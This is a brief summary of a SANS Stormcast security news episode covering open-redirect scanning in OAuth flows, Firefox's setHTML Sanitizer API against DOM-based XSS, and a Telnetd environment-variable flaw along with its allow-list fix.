SANS Stormcast Wednesday, February 25th, 2026: Open Redirects; setHTML in Firefox; Telnetd Issues

The latest Stormcast episode highlights a sharp rise in open‑redirect probes observed across the SANS honeypot fleet. Attackers are scanning for poorly validated redirect parameters, a technique that can be weaponized during OAuth 2.0 authorization flows to hijack credential exchanges. While open redirects remain outside the OWASP Top 10, the OWASP cheat sheet offers concrete mitigation steps, and the episode advises blocking traffic from known bullet‑proof hosting IPs that often shelter these campaigns.

Mozilla’s new SetHTML method, part of the Sanitizer API, is presented as a practical defense against DOM‑based cross‑site scripting. By refusing unsafe HTML—especially embedded JavaScript—SetHTML bridges the gap between the dangerously permissive innerHTML and the overly restrictive innerText. The API also integrates with Trusted Types, allowing developers to define precise tag and attribute whitelists. Currently supported in Firefox and Chrome, the feature awaits Safari adoption, which will be pivotal for a truly cross‑browser XSS mitigation standard.

A second vulnerability discussed involves Telnetd’s handling of environment variables. An attacker who can inject a crafted variable, such as the credentials directory path, may gain arbitrary file creation rights and ultimately log in as any user, including root. The recommended fix is to enforce a strict allow‑list of benign variables (e.g., LANG, LC_*) and to block all others, rather than relying on ever‑changing block‑lists. This episode underscores the ongoing risk of legacy services and the need for proactive configuration hardening.